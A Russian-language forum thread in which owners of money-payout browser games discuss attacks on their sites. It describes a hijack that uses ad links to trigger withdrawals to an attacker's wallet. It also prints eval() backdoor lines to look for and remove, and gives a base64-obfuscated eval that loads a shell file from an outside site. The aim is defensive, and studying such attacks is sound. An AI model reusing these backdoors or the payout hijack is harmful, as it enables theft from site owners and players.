Как уводят деньги с фермы (описание)

takebet

Местный
Многие новые админы ферм жалуются, что не понятным способом уводят деньги с их игры, при чём массово и на один и тот же номер кошелька.
Это объясняется отсутствием Платёжного пароля в игре и присутствием серфинга сайтов.
Злодей (так назовем взломщика), имеет свой код на своем хостинге, вписывает в этот код свой номер кошелька, сумму вывода и ссылку на сайт где есть серфинг без платежного пароля.
Выглядит ссылка примерно так: "http://sait.ru/account/payment"
Ссылка прямо указывает на страницу вывода.
Затем Злодей свой рекламный текст в серфинг и указывает ссылку на свой сайт, где прячет код с этой ссылкой и кошельком. Сейчас многие админы ставят серфинг с автомодерацией, то есть не нужно производить проверку добавленных объявлений, прежде чем запустить это объявление для просмотра в серфинге. Так вот автоматически объявление Злодея поступает в список серфинга для просмотра другими участниками. Участник кликает по ссылке, но там на секунду появляется окошечко с кошельком Злодея и суммой для вывода, но после этого участник видит открывшуюся страницу вывода с его номером кошелька. И в этот момент происходит автоматическая выплата указанной суммы на кошелек Злодея.
Сумма не большая, рассчитанная на минимальную выплату от 1 рубля и чуть выше может быть. зато много участников просматривая эту ссылку, лишаются заложенной в коде суммы, отсюда и происходит массовые выплаты на один и тот же кошелек, но с разных аккаунтов.
Есть такие Злодеи, что ставят сумму к выводу больше, например 10 рублей (1000 серебра), а когда попадается участник у которого такая сумма имеется на балансе вывода, тогда и происходит выплата Злодею.
Проверял сам на своей игре, после чего везде устанавливаю платёжный пароль.
Даже есть записанное видео в ютубе, его можно найти по поиску: массовый вывод денег с ферм. Или что-то в этом роде.
Защита очень простая и эффективная - установить платёжный пароль, тогда при выплате этот код не сможет обойти платежный пароль и деньги останутся у участников.
 

hyipblocker

Местный
Всё это бред. Не нужно пользоваться гавно-хостингами и ставить паблик движки. А также ставьте мод запоминания кошелька, чтобы пользователь мог его ввести ОДИН раз. Это надёжнее платёжного пароля. Берите VPS, и у вас есть круглосуточный мониторинг.
Через логи можно быстро найти уязвимость. Будь то SQL INJ вы сразу поймете где дыра. По логам это легко палится, просто введите в поиск SELECT/UNION/'/+ и вы поймёте это (если руки от куда надо растут.)
 

pligin

Команда форума
Администратор
Всё это бред. Не нужно пользоваться гавно-хостингами и ставить паблик движки. А также ставьте мод запоминания кошелька, чтобы пользователь мог его ввести ОДИН раз. Это надёжнее платёжного пароля. Берите VPS, и у вас есть круглосуточный мониторинг.
Через логи можно быстро найти уязвимость. Будь то SQL INJ вы сразу поймете где дыра. По логам это легко палится, просто введите в поиск SELECT/UNION/'/+ и вы поймёте это (если руки от куда надо растут.)
Я, кстати, предоставляю услуги по содержанию VPS Виртуальный север VPS на SSD
 

Жоха

Участник
Чаще всего дыры встречаются в файле payeer_merchant.php, если там есть такой код
PHP:
   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
  
   eval($_GET['fs']);
просто удалите этот код. Ещё если у вас есть топ 5 или 10 и.тд там тоже может оказаться дыра, вот код
PHP:
f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
обязательно удалите этот код
 

pligin

Команда форума
Администратор
Чаще всего дыры встречаются в файле payeer_merchant.php, если там есть такой код
PHP:
   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
 
   eval($_GET['fs']);
просто удалите этот код. Ещё если у вас есть топ 5 или 10 и.тд там тоже может оказаться дыра, вот код
PHP:
f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
обязательно удалите этот код
в фермах eval() нужно всегда удалять
 

hyipblocker

Местный
Чаще всего дыры встречаются в файле payeer_merchant.php, если там есть такой код
PHP:
   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
 
   eval($_GET['fs']);
просто удалите этот код. Ещё если у вас есть топ 5 или 10 и.тд там тоже может оказаться дыра, вот код
PHP:
f(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
обязательно удалите этот код
Вот вы пишите про него, что он так вреден.

А пример иньекции можете показать? Я просто не разбирал ещё движки особо эти. Хотя познания есть
 

pligin

Команда форума
Администратор
Я лишь просил пример, что такое eval(); я знаю, но не сталкивался с дырами в фермах, не знаю даже где искать. у меня по крайней мере в движке его вообще нет
Код:
$string = ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=;
eval(base64_decode($string));
Код:
eval(base64_decode(ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=));
 

hyipblocker

Местный
Код:
$string = ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=;
eval(base64_decode($string));
Код:
eval(base64_decode(ZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcHN3ZWIucnUvc2hlbGwudHh0Jyk=));
А ну так конечно, через base64 хоть шелл зашифровать можно. Благо дело что всё это легко расшифровать в отличии от Zend.
 

pligin

Команда форума
Администратор
Верх